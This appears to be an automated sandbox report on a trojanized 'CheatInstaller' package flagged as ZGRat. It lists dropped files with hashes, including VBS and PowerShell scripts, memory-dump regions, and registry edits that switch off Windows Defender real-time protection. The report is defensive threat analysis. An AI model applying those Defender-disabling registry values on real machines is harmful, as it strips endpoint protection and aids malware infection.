memory/1864-3728-0x0000016A9EC90000-0x0000016A9ECA0000-memory.dmp
memory/1864-3741-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
C:\Windows\Installer\MSI109D.tmp
| MD5 | 2557173f4299722afce46cc3c0616406 |
| SHA1 | b0343c9a9552be977834e415783b486c4714fe97 |
| SHA256 | e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591 |
| SHA512 | 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt
| MD5 | 5b1a12edc7b4e82163e5b39694e5b630 |
| SHA1 | 088d6df18ce940cf01789a27adeaa150f9dc26b7 |
| SHA256 | 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9 |
| SHA512 | 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav
| MD5 | 5392a5fb1c3d0ce48ee2f6db8c8c157c |
| SHA1 | 694ad4d5939fa7d468399150a026a3efce6773bf |
| SHA256 | 1033b1227e5a7814b34221274272b384f0f8ddbe31a600ff070ef1f0c1fee901 |
| SHA512 | 1a0ce0c2c5d4818eb83f38c4c3328eb4aab653a625e0e1fca5338e23f955d4da206c3b0bb3106a89736e69077f75079a3bc54fdc458cebe7389cc8a727e31988 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav
| MD5 | 1f17c039e805f0366322565c65c44a96 |
| SHA1 | 58f9a9787e412e22bdfdf80ee989cd0ca76b7ec6 |
| SHA256 | 618f46233cb90b39d0da37f37033c0f181ece8583f814ce41c11d1a4d5c49666 |
| SHA512 | 2980f1616f9cc569cc5ecbaa6c71016488867bf0d2c53b51dedd828f5da12921c3582de61f127ca566f5d35c9398af6aa4bc3600845ef569fc8ec5388bdf7dca |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv
| MD5 | 2620f56f03159589486b831d9b6adc4a |
| SHA1 | 55dfc135be75692bd64c50b429dcd5460e0b0b90 |
| SHA256 | 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71 |
| SHA512 | 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs
| MD5 | 214ee30dbd649af9294f254fc8c33d07 |
| SHA1 | e81a7486c5c19868abb7d39fc757f686c4124662 |
| SHA256 | d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52 |
| SHA512 | f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1
| MD5 | beceb9c4ac840a5ac0b51d8774e63149 |
| SHA1 | ea375fee5ff404065ba724e877c9a9b01509353b |
| SHA256 | d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34 |
| SHA512 | 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav
| MD5 | 50ef295bd5d596d5edf3d2905e4f5020 |
| SHA1 | 99ba82071df6b5790e92ccb9588fbcc9f92d4458 |
| SHA256 | f64a825a0ad6f97060458532a61c3620e2fd71eefbe80149761abfb146fc4907 |
| SHA512 | 9b67d85def8732960a377646a0ddc98bddcd7e2578f7ddb7047acb07e62483cd8707f594f6e93f78c67729917c96af5f13c7aa37bbad3505c9b5f93e7e93a9aa |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm
| MD5 | ac330f2a89a6c828059d1f125cb9cb60 |
| SHA1 | a40b10eae1fba1ea43ff70b3941a165d6d0502f2 |
| SHA256 | 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec |
| SHA512 | 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI
| MD5 | 63b9196a2025286d719198ee9edc9371 |
| SHA1 | 2e288dcecddb52ec385c87f6e4711b87a6ed1d48 |
| SHA256 | 914b995201443dcdea73e149fd2a3a43c63a9f3f5aed3c05cd46c64b4644de48 |
| SHA512 | 16d3f94ea80c161e8a531f94b2dcb5bb6baaf1a9968aff8fe2bc243e4ddc730277e27ef344955bf0452314b91347f3c305d07cf0b00f2e14fe56f36afca2f8d7 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav
| MD5 | 5acab132e4baf883d7f785fabf624952 |
| SHA1 | dcd1e3fe209cea31e72531e1484b6bb156347308 |
| SHA256 | e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1 |
| SHA512 | 714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav
| MD5 | 639eb4627992165dad32ad41df746bf7 |
| SHA1 | 286d70c527d4a0d03c5feb0348f6d6e507afaaed |
| SHA256 | fb5a9508c75910052b7761a50028084912581eec358f6378d5865a531b71ca64 |
| SHA512 | 886c1453dac99f4ebf8e3918641da602a0bd062a0111e4187be6a9ea4b11182db2d093ce8f28a21347645b74b67aa6c9d0fb1970a521e4ad8c6f0626864e8640 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav
| MD5 | 82e152e8a610da8132789c9d4a4d1d3f |
| SHA1 | 055180b27a639248c3be0b2d875630ae256d9890 |
| SHA256 | 82040461eebb7aaf3c6055884abcc642300ff37d241a1b7ee794e0b0b45b88d7 |
| SHA512 | 77e525487b3d7be2d473fc296445bfb2c06ec9ddd0cb5c0b174e40101f98326d48fd2da797e327b1fb333e5ea56fd5d1ef14582e92a5591e60da3260619c67bf |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav
| MD5 | b1938437bfc4c13e424990f4d3f2353a |
| SHA1 | fc63b1e664c5ea8faa8b5df75a2756e59ae7a40a |
| SHA256 | d531ed6375a6ade4d449389b67e0a312fc97f3fbd025a627abd72f2705fdbc26 |
| SHA512 | 680179878406763eb57112fcd942f58fcf089b6fc6c6a7b19ee0fe2ec69b5eca218539afb8d10c55b6901b273cfae93dec52e8a3a46f5e8aa684079be70547ab |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav
| MD5 | 123437d6f80fe45f397a067ce4872d89 |
| SHA1 | 3b981369c54593b4dcfd3f7e08db8f3e67a3fba9 |
| SHA256 | 25289632dccc370b326d589d06169c7383c0a39b6d220dd468a01c785d54abf9 |
| SHA512 | 25b245f916b58cd359ee017cf48171cc3624c87e7941565db5ae9d06fb3cb6a68423f4c39cc38c8a66bbe280e2a048a04d84d83700d35ed5c537d4d6525eb623 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav
| MD5 | 189ae0c626d6d7287e0ffed4389ccb05 |
| SHA1 | ec64c9f7b9fa6d6879793317e8431ac69338ddb8 |
| SHA256 | f43a43e58ecd71a43a1393a6c6a3056228e525963704ed75ae04bd5fbcd2305f |
| SHA512 | 973e344a2d266a1eb1bd848945c3cfcc16e5c4f0aa9e71f6fdfd96b9e7a18cbca630239257bf69b0922dae275e364068609be6d42f6a6209e853b2ff0600790c |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm
| MD5 | ccaca741f4002cb8af48d485501ec8e9 |
| SHA1 | 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3 |
| SHA256 | 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1 |
| SHA512 | 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm
| MD5 | ea26bb989e3e2c321a47d499d2682ae1 |
| SHA1 | a79e8c99186c20fb09f1457b3d183538e1e1b1bb |
| SHA256 | 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81 |
| SHA512 | 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav
| MD5 | f764169bffe65099eda80ace5f90e046 |
| SHA1 | 82bcaec9920ffabc3c6ea08a277511c2e871b230 |
| SHA256 | 88341a5ee3600529b8026d421d2b6004299d9bc3d89bdb3e2a8643cca107f3ed |
| SHA512 | 3eedf74feb8a30e2ddb6767b25580625e7d200e34e8a20a7412bc4e60d8ca5194c7d2436a632cedc676d93841a560bd0de9470d48f6eee4a4ad3b7d5f4064d80 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI
| MD5 | f0bb4307afbd586f0499f4023213863d |
| SHA1 | cd978f445f02aab75b1d89c5e28e348860d8c306 |
| SHA256 | 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129 |
| SHA512 | a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav
| MD5 | 84cb9d76404e7060326ed19dc51a9a1f |
| SHA1 | 5945326bbc8b4e48afbea13f8c2cf564ffbafbee |
| SHA256 | c6ca1f7b252c74ae234c25f37b8eb0122945be66701bf22486c3c27de8d9908b |
| SHA512 | 95f3fdab34ef9a3c4b797a50c2b00d068da4d309e6aad2b288c140d71a5ef45f182d36a97b99768f50fc226217b7b7ab6d4a4ba3ede529efa801cdbfea575d28 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm
| MD5 | 5cf177c70e9be2f41adc86ea7e0fc48b |
| SHA1 | 9a597f4d25a0fb4837fa06b9b3792de65fae9551 |
| SHA256 | 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3 |
| SHA512 | 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav
| MD5 | f759d9f3f35dda05908011fcaed1d018 |
| SHA1 | 0a7852907851700f7424094b7658d78743559dae |
| SHA256 | 1780f4481aae5bc51fb79a42d92946ade0c5459efd99daa67bf2d1dcae275919 |
| SHA512 | 6cb7ab0ac9cb17d194b2a635dab9e5934d36623be7c126785cd83e1d98fe55a262068bc2676fd1499a07a1160005aff7d6199e9be544fad4581debcddf1b0390 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt
| MD5 | 89e2a161df2ef245781707ff93e978bc |
| SHA1 | ab2189d5c8dca09cade0586b929f0264c327db32 |
| SHA256 | b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a |
| SHA512 | 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav
| MD5 | de35645b9bca5dee784285ee52aa407e |
| SHA1 | 3e23801fba4d83ef2c8f2ed772b0aedd8b1395b9 |
| SHA256 | a5289b50b6178e8b4c3ea814a0c25cf4b4c2c8e3a0e30e416dbdac49a61d3864 |
| SHA512 | 78c8ba646941d8806fddaa6a0ba1154daa1463703651d625a230422374b157d63bd2959fa8b561cc1e9e40b5601b65f36aae85d158d85cdf0460e5e7f637a17d |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav
| MD5 | eff17d20b4dab6510c36218f00218602 |
| SHA1 | 7264514de1d541451d3533812a36bbb2eadab1b8 |
| SHA256 | a0765c16963caa13ed260b44ecd3f99d0cbddf21d4bf0aa814379bb8e9a96470 |
| SHA512 | 5460ad1e42835a91783e566030d5e8eab449e29517b17581db09175439d5c1bbe173554d0ac33eb60f0c5cd52255b12574d61d12411e253006c53564aceab072 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav
| MD5 | 1428d595918ab12da96d7accb8a42c1d |
| SHA1 | aa263ebb0cab9c18b582b4e407d3ffd936e83d65 |
| SHA256 | d5c8cbee6fb398f36abfab142f33d4824c47e426c4d1563e5f7310c9d972b8c2 |
| SHA512 | 8948ca52fc5981bac7e8ca2e4e03ae6e002975b19db32ef4adb143fc3c5ee9e3ab19e0ebe7ad5833beff96b2b32e682bd9d2270abc0d6e86e792f8687626a7a6 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav
| MD5 | 4a1d53e7fd0f268a7fd23fb9b3139ee3 |
| SHA1 | a80942c3cab97ea97b2406fab965bb4b3c16c2fe |
| SHA256 | 7832608e235911200d1c224c201d3aefefe3b154911a53c2507cd83e31447c1f |
| SHA512 | cc00e720b65246bd0ad30dec09a35a5bc0f409645f47d8576649036408a258b7a372c0e4f5f16b222a9965a92cd2dd03fd6f782bec5f1a85438a339c310dfd01 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav
| MD5 | 5b88b489ce5a9207f1b60669d32f7a0e |
| SHA1 | d2ba6f65e8091324b5042baefd58bde2177fa724 |
| SHA256 | 216fdaac90960ee05ff540fe214cfdc314b4ae57892437c940eb7b0edb9bc87f |
| SHA512 | df3bf926e4c85adc21599348442b4e8093885030d9dd0fda3ea0a50606cfd1cd805ee89cdd7f43c48863671e68309955fac14e50bb157590e6984a2233333b29 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav
| MD5 | 149cd5cc6a68e10130db2c4a03d71de0 |
| SHA1 | 4be908d4048eebb86e3b5c95964c4bc156282dda |
| SHA256 | 6a30422fce563f3a084020eb86a3a728c3cf1eb04506e081e0fa7bbca9b54ee1 |
| SHA512 | 478038839937cbf277534635da1561b9d448ecd3b51ca00f1109417a45969777e2b523ecc065f781599e7cb4a2b80acfeedb7528e8fe8683c4b3d7788a38047e |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav
| MD5 | 0390e78a8086536f56e11b0b40be2d62 |
| SHA1 | ba61e82cce9e0ef301db174f83e94b9244faa799 |
| SHA256 | 9102b9e757cea1fddffd0f82888ff829af7f11f6c522a31939fd54daf0b3aa22 |
| SHA512 | 6182190e88ccbbb060a6779b97e27794aa69252f4196b307165006d57234aeee62283c1cfb41d405847c5079d3828706cab648281d40dafaf9cb10984868b1e9 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav
| MD5 | 0f9223e9fdb356d794ebef388a0bf432 |
| SHA1 | 4ceede02e49e2fae1a3851b3ff58de226b2ca970 |
| SHA256 | e99d3f16c079d80c3f8ee5f897828a0d2934a6c7c0170d17ad6db3a0ce9c52d1 |
| SHA512 | 4b89e85b19f760f025e06e338107834fa5e02fd58197166228cf664c09ba1335dbf2056a55a3015dce933db7e4e04893592f99768be79e4d79328007e9e183b6 |
C:\Windows\Installer\MSI392C.tmp
| MD5 | cac17c92ed0d30bc68ce60905e0af1ea |
| SHA1 | 29589b5816214f537ffb03a4ff9c79f1bd25908b |
| SHA256 | e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161 |
| SHA512 | 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20 |
C:\Windows\Installer\MSI3D65.tmp
| MD5 | 165f730f078c7019ea5f2642f8208cda |
| SHA1 | 370f2e4d1f298b62c1d4743d0e23d2a2d41f950d |
| SHA256 | 48f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6 |
| SHA512 | 36868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6 |
memory/2104-3919-0x0000000070690000-0x0000000070D7E000-memory.dmp
memory/2104-3920-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/2104-3921-0x0000000000FF0000-0x0000000001026000-memory.dmp
memory/2104-3922-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/2104-3925-0x0000000006E60000-0x0000000007488000-memory.dmp
memory/4256-3927-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/4256-3929-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp
memory/4256-3930-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp
memory/2104-3933-0x0000000006AE0000-0x0000000006B02000-memory.dmp
memory/2104-3942-0x0000000006B80000-0x0000000006BE6000-memory.dmp
memory/2104-3946-0x0000000006D60000-0x0000000006DC6000-memory.dmp
memory/4256-3948-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp
memory/2104-3949-0x0000000007530000-0x0000000007880000-memory.dmp
memory/2104-3958-0x0000000006DF0000-0x0000000006E0C000-memory.dmp
memory/2104-3961-0x00000000078D0000-0x000000000791B000-memory.dmp
memory/2104-3972-0x0000000007BA0000-0x0000000007C16000-memory.dmp
memory/4256-3983-0x0000021ED5DA0000-0x0000021ED5DB0000-memory.dmp
memory/4256-3986-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/4556-3992-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/4556-3994-0x0000019073C90000-0x0000019073CA0000-memory.dmp
memory/2104-3995-0x0000000070690000-0x0000000070D7E000-memory.dmp
memory/4556-3996-0x0000019073C90000-0x0000019073CA0000-memory.dmp
memory/4556-4013-0x0000019073C90000-0x0000019073CA0000-memory.dmp
memory/2104-4036-0x00000000090A0000-0x0000000009718000-memory.dmp
memory/2104-4037-0x00000000089F0000-0x0000000008A0A000-memory.dmp
memory/2104-4040-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/4556-4041-0x0000019073C90000-0x0000019073CA0000-memory.dmp
memory/4556-4046-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/2104-4051-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/2104-4050-0x0000000008D00000-0x0000000008D94000-memory.dmp
memory/2104-4053-0x0000000008A90000-0x0000000008AB2000-memory.dmp
memory/1000-4056-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/2104-4057-0x0000000009C20000-0x000000000A11E000-memory.dmp
memory/2104-4078-0x0000000008F90000-0x0000000009022000-memory.dmp
memory/2104-4081-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/2104-4082-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/2104-4083-0x0000000009030000-0x000000000903A000-memory.dmp
memory/1000-4084-0x000001B5EF0C0000-0x000001B5EF0D0000-memory.dmp
memory/1000-4107-0x000001B5EF0C0000-0x000001B5EF0D0000-memory.dmp
memory/1000-4110-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/3028-4114-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/3028-4116-0x000001FB13090000-0x000001FB130A0000-memory.dmp
memory/3028-4117-0x000001FB13090000-0x000001FB130A0000-memory.dmp
memory/3028-4132-0x000001FB13090000-0x000001FB130A0000-memory.dmp
memory/3028-4159-0x000001FB13090000-0x000001FB130A0000-memory.dmp
memory/3028-4162-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/4720-4166-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/4720-4169-0x0000025668FD0000-0x0000025668FE0000-memory.dmp
memory/4720-4168-0x0000025668FD0000-0x0000025668FE0000-memory.dmp
memory/2104-4184-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/4720-4185-0x0000025668FD0000-0x0000025668FE0000-memory.dmp
memory/2104-4208-0x00000000010B0000-0x00000000010C0000-memory.dmp
memory/4720-4209-0x0000025668FD0000-0x0000025668FE0000-memory.dmp
memory/4720-4212-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/1960-4224-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp
memory/1960-4229-0x000001C4EAFB0000-0x000001C4EAFC0000-memory.dmp
C:\Windows\Installer\MSI3D65.tmp
| MD5 | 8d49691d4ab2fa3cd8c679c0df30c1a1 |
| SHA1 | 71b8b4619a2b0632920f84f740e7b27af62a921e |
| SHA256 | 8412dc56077a9219c7cd04e0fccc2391eb62e32a86ad27e58b24d83c8e8227a5 |
| SHA512 | 128b1544a4a2fde1eebeaddb2b75a122f7c29f79ad47b7bc648198fdd06047ffedd9601a4bc7808ef51153005986a0fdfb0a06409c23411d13b299bda64aa9f5 |
C:\Windows\Installer\MSI3D76.tmp
| MD5 | ce5552c3b309a5f507b31c0af0c0cabf |
| SHA1 | 5a5a35ea887677e411ea5ea86dd6881d62db6edf |
| SHA256 | 3c2dc5ba528d5c31cefacc19f693b35512eb7d500511b0dbc79762d3f5f7842c |
| SHA512 | 4234ee20b71d6f0bed70179344c830be3b18ff53c3652c559f2bc2cd2b7dae142761a8ba77ef2102ac87351ccbb83ee50c855259dd0d7178a75b4412dc5b2389 |
C:\Windows\Installer\MSI3E23.tmp
| MD5 | 18db7a45912d1664716efdf6e311f5f1 |
| SHA1 | 24a5d1d2addf8095e6f5e4040a2e1c44956bb141 |
| SHA256 | 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c |
| SHA512 | 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff |
C:\Config.Msi\e57f724.rbs
| MD5 | 31d851fdd65d7164812bd719fcb59b95 |
| SHA1 | 967a56f5b661101e4dafb6ce1226df4a27d1a846 |
| SHA256 | 7c4f1f4ef660b7d40ae25ee38b63e3ceb21b62cef122803f8a8cc5eb95bd877a |
| SHA512 | 82944e9885b16771601cf2361058c33029009aed2de9f52740c098a3ca383665daa8368291a385d5d1789fbb6b7d550f987f1f43ec256761ba0c90ac2daf983b |
C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\mock-globals\.gitignore
| MD5 | 8da13f306c8c0f4f4a32960e93725b42 |
| SHA1 | b9ee3f4a8b64284a8f698206993e4ec2cf83f66f |
| SHA256 | ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0 |
| SHA512 | 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc |
memory/4908-4404-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/4908-4406-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/4908-4415-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/4908-4424-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/1988-4429-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4430-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1160-4427-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4432-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4437-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4439-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4444-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4446-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4451-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4453-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4458-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4460-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4464-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4468-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4470-0x0000000005320000-0x0000000005590000-memory.dmp
memory/4908-4463-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/1160-4477-0x0000000005320000-0x0000000005590000-memory.dmp
memory/4908-4478-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/1160-4484-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4483-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1988-4475-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/4908-4449-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/1988-4491-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4490-0x0000000005320000-0x0000000005590000-memory.dmp
memory/4908-4435-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/4908-4492-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp
memory/1988-4498-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4503-0x0000000005320000-0x0000000005590000-memory.dmp
memory/1988-4504-0x00000000053A0000-0x000000000561F000-memory.dmp
memory/1160-4497-0x0000000005320000-0x0000000005590000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-18 14:42
Reported
2024-03-18 14:48
Platform
win10v2004-20240226-en
Max time kernel
298s
Max time network
297s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
